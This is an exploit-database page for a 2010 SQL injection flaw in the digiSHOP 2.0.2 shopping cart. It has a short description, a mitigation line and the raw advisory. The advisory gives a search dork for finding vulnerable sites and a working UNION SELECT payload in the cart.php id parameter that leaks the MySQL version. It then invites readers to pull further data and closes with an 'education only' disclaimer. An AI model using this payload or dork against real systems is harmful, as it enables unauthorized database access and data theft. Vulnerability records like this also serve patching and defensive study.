header-logo
Suggest Exploit
vendor:
digiSHOP
by:
Silic0n
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: digiSHOP
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:digisoft77:digishop:2.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

digiSHOP 2.0.2 SQL Injection Vulnerability

A SQL injection vulnerability exists in digiSHOP 2.0.2 which allows an attacker to execute arbitrary SQL commands on the vulnerable system. By sending a specially crafted HTTP request to the vulnerable application, an attacker can execute arbitrary SQL commands on the underlying database. This can be used to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

 
-----------------------------------
		             TM	  |
  ___ ___          _______ 	  |
 |   Y   | ______ |       |	  |
 |.  1   ||______||.|   | |	  |
 |.  _   |        `-|.  |-'	  |
 |:  |   |          |:  |  	  |
 |::.|:. |          |::.|  	  |
 `--- ---'          `---'  	  |
	Private Place Of 0days    |
-----------------------------------
 
^Exploit Title  : 
^Date       	: 23/7/2010
^Vendor Site    : http://digishop.digisoft77.com/
^MOD Version    : digiSHOP 2.0.2
^Author         : Silic0n (science_media017[At]yahoo.com)
^Team Site  	: www.hacking-truths.net
^Dork		: inurl:cart.php?m=features&id=
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o, Belma(sweety) ,Danzel, 
messsy , ,abronsius ,Nova ,ConsoleFx , Exi , Beenu , R4cal , jaya ,@ry@n,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/{Shop path}/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7

MySql Version : 4.1.22-log 

Now Use Brain.Exe (7) To extract the Other information 
this exploit is only education Purpose only ,author or team member is not responsible for any harm

------------------------------------------------------------------------------